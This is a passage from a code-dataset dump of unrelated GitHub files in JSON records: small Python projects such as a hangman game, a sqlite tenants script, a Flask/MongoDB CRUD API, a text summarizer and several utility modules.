shift).GetBlue(),\n )\n )\n for i in range(window)\n ]\n )\n\n\n# EOF\n","repo_name":"fscutti/pyrate","sub_path":"pyrate/utils/ROOT_classes.py","file_name":"ROOT_classes.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71458558613","text":"import sqlite3\nimport sys\nimport random\nfrom random import randrange\nfrom datetime import datetime, timedelta, date, time\n\ndb = sys.argv[1]\nconn = sqlite3.connect(db)\ncursor = conn.cursor()\ncursor.execute('PRAGMA foreign_keys=ON;') \nconn.commit()\n\ndef main():\n\n\t\n\tprice_range()\n\t#tenants()\n\ndef price_range():\n\tleft_range_input = input(\"What is the minimum price?: \")\n\tright_range_input = input(\"What is the maximum price?: \")\n\tsuit_input = input(\"What is the suit type?: \")\n\n\tcursor.execute(\"SELECT sID, price FROM Suits WHERE ? LIKE type AND price >= ? AND price <= ? ORDER BY price ASC\", (suit_input, left_range_input, right_range_input))\n\tsuites = cursor.fetchall()\n\tconn.commit()\n\n\tfor row in suites:\n\t\tprint(row)\n\ndef tenants():\n\tid_input = input(\"What is the suit ID?: \")\n\n\n\t\n\t#cursor.execute(create_query)\n\t#conn.commit()\n\n\tcursor.execute(\"SELECT * FROM Tenants WHERE sID = ? 
AND yearOfOccup < 2000;\", (id_input,))\n\n\tcol1 = cursor.description[0][0]\n\tcol2 = cursor.description[1][0]\n\tcol3 = cursor.description[2][0]\n\tcol4 = cursor.description[3][0]\n\n\tcreate_query = '''CREATE TABLE selected_tenants (\n %s INTEGER,\n %s TEXT,\n %s INTEGER,\n %s INTEGER,\n PRIMARY KEY (tID),\n FOREIGN KEY (sID) REFERENCES Suits\n);''' % (col1,col2,col3,col4)\n\n\t\n\n\tdata = cursor.fetchall()\n\t#print(data)\n\tconn.commit()\n\n\tcursor.execute(\"drop table if exists selected_tenants;\")\n\tconn.commit()\n\tcursor.execute(create_query)\n\tconn.commit()\n\n\t#cursor.execute(\"SELECT * FROM selected_tenants\")\n\t#print(\"name of the first column: \" + cursor.description[0][0])\n\t#conn.commit()\n\n\tfor row in data:\n\t\ti_tID = row[0]\n\t\ti_name = row[1]\n\t\ti_year = row[2]\n\t\ti_sID = row[3]\n\t\ttenant_data = (i_tID, i_name, i_year, i_sID)\n\t\tprint(tenant_data)\n\t\tcursor.execute(\"INSERT INTO selected_tenants(tID, name, yearOfOccup, sID) VALUES (?,?,?,?)\", tenant_data)\n\t\tconn.commit()\n\n\n\n\n\n\n\n\n\n\n\n\nmain()\nconn.close()","repo_name":"gnassar97/sqlite-mock-administrative-database","sub_path":"tenants.py","file_name":"tenants.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6505747858","text":"# -*- coding: utf-8 -*-\n# http://www.django-rest-framework.org/topics/3.7-announcement/#customizing-api-docs-schema-generation\ntry:\n from rest_framework.schemas import AutoSchema\nexcept ImportError:\n EsAutoSchema = type(\"EsAutoSchema\", tuple(), dict())\nelse:\n from rest_framework.schemas.utils import is_list_view\n\n class EsAutoSchema(AutoSchema):\n \"\"\"Elasticsearch inspector for APIView.\n Responsible for per-view introspection and schema generation.\n \"\"\"\n def get_es_filter_fields(self, path, method):\n fields = []\n for filter_backend in self.view.es_filter_backends:\n fields += filter_backend().get_schema_fields(self.view)\n return fields\n\n def get_filter_fields(self, path, method):\n fields = super(EsAutoSchema, self).get_filter_fields(path, method)\n fields += self.get_es_filter_fields(path, method)\n return fields\n\n def get_es_pagination_fields(self, path, method):\n view = self.view\n if not is_list_view(path, method, view):\n return []\n\n pagination = getattr(view, 'es_pagination_class', None)\n if not pagination:\n return []\n\n return pagination().get_schema_fields(view)\n\n def get_pagination_fields(self, path, method):\n fields = super(EsAutoSchema, self).get_pagination_fields(path, method)\n fields += self.get_es_pagination_fields(path, method)\n return fields\n","repo_name":"myarik/django-rest-elasticsearch","sub_path":"rest_framework_elasticsearch/es_inspector.py","file_name":"es_inspector.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"67"} +{"seq_id":"17785853909","text":"# Hangman game\n\nimport random\n\nWORDLIST_FILENAME = \"C:\\Sanket Jain\\Coding\\Python Code\\words.txt\"\n
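# NOTE: the hard-coded absolute Windows path above must point at a local words.txt copy\n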
\ndef loadWords():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef chooseWord(wordlist):\n \"\"\"\n wordlist (list): list of words (strings)\n\n Returns a word from wordlist at random\n \"\"\"\n return random.choice(wordlist)\n\n\n\nwordlist = loadWords()\n\ndef isWordGuessed(secretWord, lettersGuessed):\n '''\n secretWord: string, the word the user is guessing\n lettersGuessed: list, what letters have been guessed so far\n returns: boolean, True if all the letters of secretWord are in lettersGuessed;\n False otherwise\n '''\n x = set(secretWord)\n y = [True if i in lettersGuessed else False for i in x]\n return all(y)\n\n\n\ndef getGuessedWord(secretWord, lettersGuessed):\n '''\n secretWord: string, the word the user is guessing\n lettersGuessed: list, what letters have been guessed so far\n returns: string, comprised of letters and underscores that represents\n what letters in secretWord have been guessed so far.\n '''\n return \"\".join(map(str,[\"_ \" if x not in lettersGuessed else x for x in secretWord]))\n\n\n\ndef getAvailableLetters(lettersGuessed):\n '''\n lettersGuessed: list, what letters have been guessed so far\n returns: string, comprised of letters that represents what letters have not\n yet been guessed.\n '''\n return \"\".join(map(str,[\"\" if x in lettersGuessed else x for x in \"abcdefghijklmnopqrstuvwxyz\"]))\n \n\ndef hangman(secretWord):\n '''\n secretWord: string, the secret word to guess.\n\n Starts up an interactive game of Hangman.\n\n * At the start of the game, lets the user know how many \n letters the secretWord contains.\n\n * Asks the user to supply one guess (i.e. letter) per round.\n\n * The user receives feedback immediately after each guess \n about whether their guess appears in the computer's word.\n\n * After each round, the user is displayed the \n partially guessed word so far, as well as letters that the \n user has not yet guessed.\n '''\n loadWords()\n print(\"Welcome to the game Hangman!\")\n length_of_chosen_word = len(secretWord)\n print(\"I am thinking of a word that is \"+str(length_of_chosen_word)+\" letters long.\")\n print(\"-------------\")\n x = 8\n lettersGuessed = []\n while x > 0:\n print(\"You have \"+str(x)+\" guesses left.\")\n print(\"Available letters: \"+getAvailableLetters(lettersGuessed))\n guess = input(\"Please guess a letter: \")\n guessInLowerCase = guess.lower()\n if guessInLowerCase in getAvailableLetters(lettersGuessed):\n lettersGuessed.append(guessInLowerCase)\n if isWordGuessed(secretWord, lettersGuessed):\n print(\"Good guess: \"+secretWord)\n print(\"-------------\")\n print(\"Congratulations, you won!\")\n break\n elif guessInLowerCase in set(secretWord):\n print(\"Good guess: \"+getGuessedWord(secretWord, lettersGuessed))\n print(\"-------------\")\n x += 0\n else:\n print(\"Oops! That letter is not in my word: \"+getGuessedWord(secretWord, lettersGuessed))\n print(\"-------------\")\n x-=1\n else:\n print(\"Oops! You've already guessed that letter: \"+getGuessedWord(secretWord, lettersGuessed))\n print(\"-------------\")\n x += 0\n else:\n print(\"Sorry, you ran out of guesses. 
The word was \"+secretWord+\".\")\n\n\nsecretWord = chooseWord(wordlist).lower()\nhangman(secretWord)\n","repo_name":"Sanket1704/Hangman-Game","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74032963732","text":"import os\nimport sys\n\nimport setuptools\nfrom setuptools import setup, find_packages\n\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\nclassifiers = [\n #'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Scientific/Engineering :: Mathematics',\n 'Topic :: Scientific/Engineering :: Physics']\n\nsetuptools.setup(\n name='pyladder',\n version='0.0.8',\n packages=setuptools.find_packages(),\n include_package_data=False,\n author='Harald Ujc',\n author_email='harald.ujc@screenpopsoftware.com',\n maintainer='Harald ujc',\n maintainer_email='harald.ujc@screenpopsoftware.com',\n description='A python package for planarity testing and rendering of ladder type graphs',\n classifiers=classifiers,\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/haraldujc/pyladder',\n python_requires='>=3.6',\n license='BSD License'\n)","repo_name":"haraldujc/pyladder","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36435215026","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef bonAppetit(bill, k, b):\n # Write your code here\n razn = sum(bill) - bill[k]\n del2 = razn//2\n if b != del2:\n print (b - del2)\n else:\n print('Bon Appetit')\n\nif __name__ == '__main__':\n first_multiple_input = input().rstrip().split()\n\n n = int(first_multiple_input[0])\n\n k = int(first_multiple_input[1])\n\n bill = list(map(int, input().rstrip().split()))\n\n b = int(input().strip())\n\n bonAppetit(bill, k, b)\n","repo_name":"H1bro/Hackerrank-Problem-Solving-Solutions","sub_path":"HackerRank-Bill Division/Bill_Division.py","file_name":"Bill_Division.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19347334488","text":"from jinja2 import contextfunction\nfrom jinja2.ext import Extension\n\nclass openttd(Extension):\n def __init__(self, environment):\n super(openttd, self).__init__(environment)\n environment.globals[\"openttd_auto\"] = self.__auto\n\n @contextfunction\n def __auto(self, context, key):\n \"\"\"\n Shorthand for creating a ``key = value`` entry in an openttd config.\n \"\"\"\n\n config_key = context[\"openttd\"][\"config\"]\n config = context[\"openttd\"][\"config_def\"][config_key]\n value = config[key]\n\n if isinstance(value, bool):\n value = \"true\" if value else \"false\"\n return \"%s = %s\" % (key, value)\n","repo_name":"bgw/ansible-playbooks","sub_path":"plugins/jinja2_plugins/openttd.py","file_name":"openttd.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"67"} +{"seq_id":"9129154149","text":"# -*- coding:utf-8 
-*-\n\nfrom pyculiarity.detect_ts import detect_ts as detect_ts_func  # import the function, not the module\nimport pandas as pd\n\nn_file = 'machine_temperature_system_failure'\ntimeS_DF = pd.read_csv('./data/%s.csv'% n_file, usecols = ['timestamp', 'value'])\n# print(timeS_DF)\n\n\"\"\" detect_ts grouped by only_last / longterm / resample_period \"\"\"\n# PARAM > max_anoms: maximum fraction of anomalies S-H-ESD may detect (%, at most 0.5); direction: direction (pos, neg, both); only_last: period of interest (day, hr, None); resample_period: resampling period\n# PARAM > threshold: Only report positive going anoms above the threshold specified. Options are: (None | 'med_max' | 'p95' | 'p99')\n# machine_temperature_system_failure\nresults = detect_ts_func(timeS_DF, max_anoms=0.01, direction='both', only_last= None, resample_period='H')\n#print(results)\n\n\"\"\" Plotting \"\"\"\n# reformat the index and columns\ntimeS_DF = timeS_DF.set_index('timestamp')\n\nanomsDF = results['anoms']\nanomsDF.drop(['timestamp'], axis = 1, inplace = True)\nanomsDF['is_anom'] = True\n# anomsDF.columns = ['anom_value','is_anom']\n\nmerged_DF = pd.merge(left = timeS_DF, right= anomsDF, left_index=True, right_index=True, how = 'left')\n# merged_DF.drop('anom_value',axis = 1,inplace=True)\n\n\"\"\" Deliverables \"\"\"\nprint ('>>> the number of anomalies: ', len(results['anoms']))\nprint (results['anoms'].head())\n\n\n\n","repo_name":"17billion/s_h_esd","sub_path":"S_H_ESD_anom.py","file_name":"S_H_ESD_anom.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27420005809","text":"\"\"\"Module for generating and collecting embedded resource results.\"\"\"\n\nfrom __future__ import absolute_import\n\nimport os\n\nfrom buildscripts.mobile import adb_monitor\nfrom buildscripts.resmokelib import config as _config\nfrom buildscripts.resmokelib.testing.hooks import interface\n\n\nclass CollectEmbeddedResources(interface.Hook): # pylint: disable=too-many-instance-attributes\n \"\"\"CollectEmbeddedResources class.\n\n CollectEmbeddedResources starts and stops the resource monitoring for each test.\n \"\"\"\n\n DESCRIPTION = \"Embedded resources\"\n\n def __init__(self, hook_logger, fixture, sample_interval_ms=500, threads=1):\n \"\"\"Initialize CollectEmbeddedResources.\"\"\"\n interface.Hook.__init__(self, hook_logger, fixture, CollectEmbeddedResources.DESCRIPTION)\n self.hook_logger = hook_logger\n self.adb = None\n self.adb_control = None\n if _config.BENCHRUN_DEVICE == \"Android\":\n self.report_root = _config.BENCHRUN_REPORT_ROOT\n self.sample_interval_ms = sample_interval_ms\n self.threads = threads\n self.battery_file = \"battery.csv\"\n self.cpu_file = \"cpu.json\"\n self.memory_file = \"memory.csv\"\n self.adb = adb_monitor.Adb(logger=hook_logger)\n\n def before_test(self, test, test_report):\n \"\"\"Start ADB monitoring.\"\"\"\n if self.adb:\n battery_file = self._report_path(test, \"battery.csv\")\n cpu_file = self._report_path(test, \"cpu.json\")\n memory_file = self._report_path(test, \"memory.csv\")\n self.adb_control = adb_monitor.AdbControl(\n self.adb, logger=self.hook_logger, battery_file=battery_file, cpu_file=cpu_file,\n memory_file=memory_file, sample_interval_ms=self.sample_interval_ms)\n self.hook_logger.info(\"Starting ADB monitoring for test %s\", test.short_name())\n self.hook_logger.info(\"ADB resource files: %s %s %s\", battery_file, cpu_file,\n memory_file)\n self.adb_control.start()\n\n def after_test(self, test, test_report):\n \"\"\"Stop ADB monitoring.\"\"\"\n if self.adb_control:\n 
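# adb_control is only created in before_test (Android only), so guard the stop\n 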
self.hook_logger.info(\"Stopping ADB monitoring for test %s\", test.short_name())\n self.adb_control.stop()\n\n def _report_path(self, test, report_name):\n \"\"\"Return the report path. Reports are stored in //thread/.\"\"\"\n return os.path.join(self.report_root, test.short_name(), \"thread{}\".format(self.threads),\n report_name)\n","repo_name":"hwCloudDBSDDS/dds","sub_path":"buildscripts/resmokelib/testing/hooks/collect_embedded_resources.py","file_name":"collect_embedded_resources.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"72"} +{"seq_id":"16617226741","text":"from db.run_sql import run_sql\nfrom models.fixture import Fixture\nfrom models.player import Player\nimport repositories.player_repository as player_repository\nfrom models.team import Team\nimport repositories.team_repository as team_repository\n\n# add new fixture to database\ndef save(fixture):\n sql = \"INSERT INTO fixtures (team1_id, team2_id) VALUES (%s, %s) RETURNING id\"\n values = [fixture.team1, fixture.team2]\n results = run_sql(sql, values)\n id = results[0]['id']\n fixture.id = id\n return fixture\n\n# get all fixtures from database\ndef select_all():\n fixtures = []\n sql = \"SELECT * FROM fixtures\"\n results = run_sql(sql)\n for result in results:\n team1 = team_repository.select(result[\"team1_id\"])\n team2 = team_repository.select(result[\"team2_id\"])\n fixture = Fixture(team1, team2, result[\"id\"])\n fixtures.append(fixture)\n return fixtures\n\n# get specific fixture from database\ndef select(id):\n sql = \"SELECT * FROM fixtures WHERE id = %s\"\n values = [id]\n result = run_sql(sql, values)[0]\n fixture = Fixture(result[\"team1_id\"], result[\"team2_id\"], result[\"id\"])\n return fixture\n\n# update specific fixture in database\ndef update(fixture):\n sql = \"UPDATE fixtures SET (team1_id, team2_id) = (%s, %s) WHERE id = %s\"\n values = [fixture.team1, fixture.team2, fixture.id]\n run_sql(sql, values)\n\n# delete all\ndef delete_all():\n sql = \"DELETE FROM fixtures\"\n run_sql(sql)\n\n#delete specific entry\ndef delete(id):\n sql = \"DELETE FROM fixtures WHERE id = %s\"\n values = [id]\n run_sql(sql, values)\n","repo_name":"RichardsonMark/project-sports-scoring","sub_path":"repositories/fixture_repository.py","file_name":"fixture_repository.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44258531560","text":"import nltk\nfrom nltk.corpus import stopwords\nfrom string import punctuation\nfrom operator import itemgetter\n\nfi = open(\"input.txt\", \"r\")\ntext = fi.read()\nprint(\" The original paragraph is : \\n\")\nprint(text)\nprint()\nnewtext = text.lower()\ntext = nltk.sent_tokenize(text)\n\n#getting the list of stopwords\nstopWords = stopwords.words('english')\npt = list(punctuation)\nfor i in pt:\n\tstopWords.append(i)\n\nsent = nltk.sent_tokenize(newtext)\n\ntokens = []\ntitle = sent[0]\ntitletokens = nltk.word_tokenize(title)\nsent = sent[1:]\n\n\nfor i in range(len(sent)):\n\twords = nltk.word_tokenize(sent[i])\n\tfiltered = []\n\tfor w in words:\n\t\tif w not in stopWords:\n\t\t\tfiltered.append(w)\n\ttokens.append(filtered)\n\n#print(\" Tokens in the input are : \")\n#print(tokens)\n\n#scores for all sentences except title\nscores = []\nfor i in 
range(len(sent)):\n\tscores.append([])\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 1) Sentence Location\n\nscores[0].append(1.0)\nscores[1].append(0.8)\nscores[2].append(0.6)\nscores[3].append(0.4)\nscores[4].append(0.2)\n\nfor i in range(5, len(sent)):\n\tscores[i].append(0)\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 2) Sentence Length\n\nmaxlength = max(len(s) for s in sent)\nfor i in range(len(sent)):\n\tscores[i].append(len(sent[i])/maxlength)\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 3) Term Frequency\n\nfrequencies = []\nmaxf = []\nfor i in range(len(sent)):\n\tf = []\n\tfor w in tokens[i]:\n\t\tfreq = 0\n\t\tfor j in range(len(sent)):\n\t\t\tfreq += tokens[j].count(w)\n\t\tf.append(freq)\n\tfrequencies.append(f)\n\tmaxf.append(max(f))\n\nmaxfreq = max(maxf)\n\nfor i in range(len(sent)):\n\ttf = []\n\tfor j in range(len(tokens[i])):\n\t\ttf.append(frequencies[i][j]/maxfreq)\n\tscores[i].append(sum(tf)/len(tf))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 4) TF-IDF\n# For our examples, TF-IDF is same as TF because we use only one document in corpus\n\nfor i in range(len(sent)):\n\ttf = []\n\tfor j in range(len(tokens[i])):\n\t\ttf.append(frequencies[i][j]/maxfreq)\n\tscores[i].append(sum(tf)/len(tf))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 5) Sentence resemblance to Title\n\nfor i in range(len(sent)):\n\tcount = 0\n\tfor w in titletokens:\n\t\tif w in tokens[i]:\n\t\t\tcount += 1\n\tscores[i].append(count/(len(sent[i])+len(titletokens)))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 6) Sentence centrality\n\nfor i in range(len(sent)):\n\tcount = 0\n\tfor w in tokens[i]:\n\t\tc = 0\n\t\tfor j in range(len(sent)):\n\t\t\tif i!=j :\n\t\t\t\tif w in tokens[j]:\n\t\t\t\t\tc += 1\n\t\tif c!=0:\n\t\t\tcount += 1\n\tscores[i].append(count/len(tokens))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 7) Sentence inclusion of emphasis words\n\nemphasis = [\"very\" , \"amazingly\" , \"remarkably\" , \"especially\", \"certainly\", \"crucially\", \"truly\", \"really\", \"exceptionally\", \"particularly\", \"specifically\", \"seriously\", \"importantly\", \"surely\", \"extremely\", \"incredibly\", \"absolutely\", \"quite\", \"highly\", \"indeed\"]\n\nfor i in range(len(sent)):\n\tcount = 0\n\tfor w in tokens[i]:\n\t\tif w in emphasis:\n\t\t\tcount += 1\n\tscores[i].append(count/len(sent[i]))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 8) Sentence inclusion of name entities\n\nfor i in range(len(sent)):\n\tcount = 0\n\ttags = nltk.pos_tag(tokens[i])\n\tfor a,b in tags :\n\t\tif b == \"NNP\":\n\t\t\tcount += 1\n\tscores[i].append(count/len(sent[i]))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\n# 9) Sentence inclusion of numeric data\n\nfor i in 
range(len(sent)):\n\tcount = 0\n\tfor w in tokens[i]:\n\t\tif w.isdigit():\n\t\t\tcount += 1\n\tscores[i].append(count/len(sent[i]))\n\n#--------------------------------------------------------------------------------------------------------------------------------------\nwt = [14,3,1,5,4,13,12,11,2]\ntotal = []\n\nfor i in range(len(sent)):\n\ts = 0\n\tfor j in range(len(wt)):\n\t\ts += wt[j]*scores[i][j]\n\ttotal.append(s)\n\n#print(scores)\n#print(total)\n\nn = int(input(\" How many lines of summary : \"))\nlarge = max(total)\n\nfinal = []\nfor i in range(len(total)):\n\tfinal.append([])\n\tfinal[i].append(total[i])\n\tfinal[i].append(i)\n\n#print(final)\nfinal.sort()\nfinal.reverse()\nfinal = final[0:n]\n#print(final)\nfinal.sort(key=itemgetter(1))\n#print(final)\n\nfor i in range(n):\n\tprint(text[final[i][1]+1], end='')\n\nprint()\n","repo_name":"divyamadhav/Automatic-Text-Summarization","sub_path":"summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33893533850","text":"from flask import Flask, request\nfrom flask.json import jsonify\nfrom flask_cors import CORS, cross_origin\nfrom flask_pymongo import PyMongo, ObjectId\n\nname_reviewer = \"Nancy C. Johnson\"\n\n# Create the connection to the database\napp = Flask(__name__)\n# URI to the real DB with all the dataset items\n# Note: the Create and PUT methods do not work because the allowed data limit was exceeded; DELETE and GET work correctly.\napp.config['MONGO_URI'] = ''\n\n## app.config['MONGO_URI'] = 'mongodb://localhost/Electronics'\n# URI to the test DB, which only contains 20 items of the original dataset\n# Note: all methods work as they should\n\n\napp.config['CORS_HEADERS'] = 'Content-Type'\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\nmongo = PyMongo(app)\ndb = mongo.db.electronicos\n\n\n\n# CRUD: add a new item\n@app.route('/electronics', methods=['POST'])\ndef createElectronic():\n id = db.insert_one({\n 'reviewerID': request.get_json(force=True)['reviewerID'],\n 'asin': request.get_json(force=True)['asin'],\n 'reviewerName': request.get_json(force=True)['reviewerName'],\n 'helpful': request.get_json(force=True)['helpful'],\n 'reviewText': request.get_json(force=True)['reviewText'],\n 'overall': request.get_json(force=True)['overall'],\n 'summary': request.get_json(force=True)['summary'],\n 'unixReviewTime': request.get_json(force=True)['unixReviewTime'],\n 'reviewTime': request.get_json(force=True)['reviewTime'],\n 'category': request.get_json(force=True)['category'],\n 'class': request.get_json(force=True)['class']\n })\n return jsonify({'msg': 'Electronic created'})\n\n# CRUD: fetch all items\n# @app.route('/electronics/<initialPage>/<endPage>', methods=['GET'])\n# def getElectronics(initialPage, endPage):\n# electronics = []\n# for index in range(int(initialPage), int(endPage)):\n# electronic = db.find()[index]\n# if(not 'reviewerName' in electronic):\n# electronic['reviewerName'] = \"NULL\"\n\n# electronics.append({\n# '_id': str(ObjectId(electronic['_id'])),\n# 'reviewerID': electronic['reviewerID'],\n# 'asin': electronic['asin'],\n# 'reviewerName': electronic['reviewerName'],\n# 'helpful': electronic['helpful'],\n# 'reviewText': electronic['reviewText'],\n# 'overall': electronic['overall'],\n# 'summary': electronic['summary'],\n# 'unixReviewTime': electronic['unixReviewTime'],\n# 'reviewTime': electronic['reviewTime'],\n# 'category': electronic['category'],\n# 'class': electronic['class'],\n# })\n# return jsonify(electronics)\n
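\n# The paginated variant above was left commented out; the active route below\n# simply returns the first 3000 documents.\n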
\n@app.route('/electronics', methods=['GET'])\ndef getElectronics():\n electronics = []\n for electronic in db.find().limit(3000):\n if(not 'reviewerName' in electronic):\n electronic['reviewerName'] = \"NULL\"\n electronics.append({\n '_id': str(ObjectId(electronic['_id'])),\n 'reviewerID': electronic['reviewerID'],\n 'asin': electronic['asin'],\n 'reviewerName': electronic['reviewerName'],\n 'helpful': electronic['helpful'],\n 'reviewText': electronic['reviewText'],\n 'overall': electronic['overall'],\n 'summary': electronic['summary'],\n 'unixReviewTime': electronic['unixReviewTime'],\n 'reviewTime': electronic['reviewTime'],\n 'category': electronic['category'],\n 'class': electronic['class'],\n })\n return jsonify(electronics)\n\n\n# CRUD: fetch a single item\n@app.route('/electronic/<id>', methods=['GET'])\ndef getElectronic(id):\n electronic = db.find_one({'_id': ObjectId(id)})\n print(electronic)\n return jsonify({\n '_id': str(ObjectId(electronic['_id'])),\n 'reviewerID': electronic['reviewerID'],\n 'asin': electronic['asin'],\n 'reviewerName': electronic['reviewerName'],\n 'helpful': electronic['helpful'],\n 'reviewText': electronic['reviewText'],\n 'overall': electronic['overall'],\n 'summary': electronic['summary'],\n 'unixReviewTime': electronic['unixReviewTime'],\n 'reviewTime': electronic['reviewTime'],\n 'category': electronic['category'],\n 'class': electronic['class']\n })\n\n# CRUD: delete a single item\n@app.route('/electronics/<id>', methods=['DELETE'])\ndef deleteElectronic(id):\n db.delete_one({'_id': ObjectId(id)})\n return jsonify({'msg': 'Electronic Deleted'})\n\n# CRUD: update a single item\n@app.route('/electronics/<id>', methods=['PUT'])\ndef updateElectronic(id):\n db.update_one({'_id': ObjectId(id)}, {'$set': {\n 'reviewerID': request.get_json(force=True)['reviewerID'],\n 'asin': request.get_json(force=True)['asin'],\n 'reviewerName': request.get_json(force=True)['reviewerName'],\n 'helpful': request.get_json(force=True)['helpful'],\n 'reviewText': request.get_json(force=True)['reviewText'],\n 'overall': request.get_json(force=True)['overall'],\n 'summary': request.get_json(force=True)['summary'],\n 'unixReviewTime': request.get_json(force=True)['unixReviewTime'],\n 'reviewTime': request.get_json(force=True)['reviewTime'],\n 'category': request.get_json(force=True)['category'],\n 'class': request.get_json(force=True)['class']\n }})\n return jsonify({'msg': 'Electronic updated'})\n\n@app.route('/electronics/result', methods=['POST'])\ndef createTask():\n global name_reviewer\n name_reviewer = request.get_json(force=True)['taskName']\n return jsonify(name_reviewer)\n\n@app.route('/electronics/result', methods=['GET'])\ndef getresultTask():\n global name_reviewer\n result = []\n if name_reviewer != \"\":\n for index in db.aggregate([\n {\"$match\": {\"reviewerName\": name_reviewer}},\n {\"$group\": {\"_id\": \"$reviewerID\", \"count\": {\"$sum\":1}}}\n ]):\n result.append(index)\n name_reviewer = \"\"\n else:\n result = [{\"_id\": \"None\", \"count\": 0}]\n return jsonify(result)\n\n# Enable debug mode\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"maalloor/DistributedSystems-Project","sub_path":"Backend/src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"41867853326","text":"from __future__ import annotations\n\nimport uuid\nfrom unittest import mock\n\nimport websockets\n\nfrom proxystore.p2p.relay.authenticate import GlobusUser\nfrom proxystore.p2p.relay.manager import Client\nfrom proxystore.p2p.relay.manager import ClientManager\n\n\ndef mock_websocket() -> websockets.server.WebSocketServerProtocol:\n with mock.patch('websockets.server.WebSocketServerProtocol'):\n return websockets.server.WebSocketServerProtocol() # type: ignore[call-arg]\n\n\ndef generate_client() -> Client[GlobusUser]:\n return Client(\n name='name',\n uuid=uuid.uuid4(),\n user=GlobusUser('username', uuid.uuid4()),\n websocket=mock_websocket(),\n )\n\n\ndef test_client_equality() -> None:\n assert generate_client() != generate_client()\n\n client1 = generate_client()\n client2 = Client(\n name='other-name',\n uuid=client1.uuid,\n user=client1.user,\n websocket=mock_websocket(),\n )\n assert client1 == client2\n\n assert client1 != object\n\n\ndef test_client_repr() -> None:\n assert isinstance(repr(generate_client()), str)\n\n\ndef test_client_manager() -> None:\n manager: ClientManager[GlobusUser] = ClientManager()\n\n # Test operations on empty manager\n assert len(manager.get_clients()) == 0\n assert manager.get_client_by_uuid(uuid.uuid4()) is None\n assert manager.get_client_by_websocket(mock_websocket()) is None\n\n # Basic add / get client\n client = generate_client()\n manager.add_client(client)\n assert len(manager.get_clients()) == 1\n assert manager.get_client_by_uuid(client.uuid) is client\n assert manager.get_client_by_websocket(client.websocket) is client\n\n # Remove a client + remove an already removed client\n manager.remove_client(client)\n assert len(manager.get_clients()) == 0\n manager.remove_client(client)\n\n # Add many clients\n count = 5\n for _ in range(count):\n manager.add_client(generate_client())\n assert len(manager.get_clients()) == count\n","repo_name":"proxystore/proxystore","sub_path":"tests/p2p/relay/manager_test.py","file_name":"manager_test.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"70088188713","text":"sequence = input(\"What is the genomic sequence? \")\nk = int(input(\"What is the length k of each kmer? \"))\nL = int(input(\"What is the length of clump L? \"))\nt = int(input(\"What is the minimum times t? 
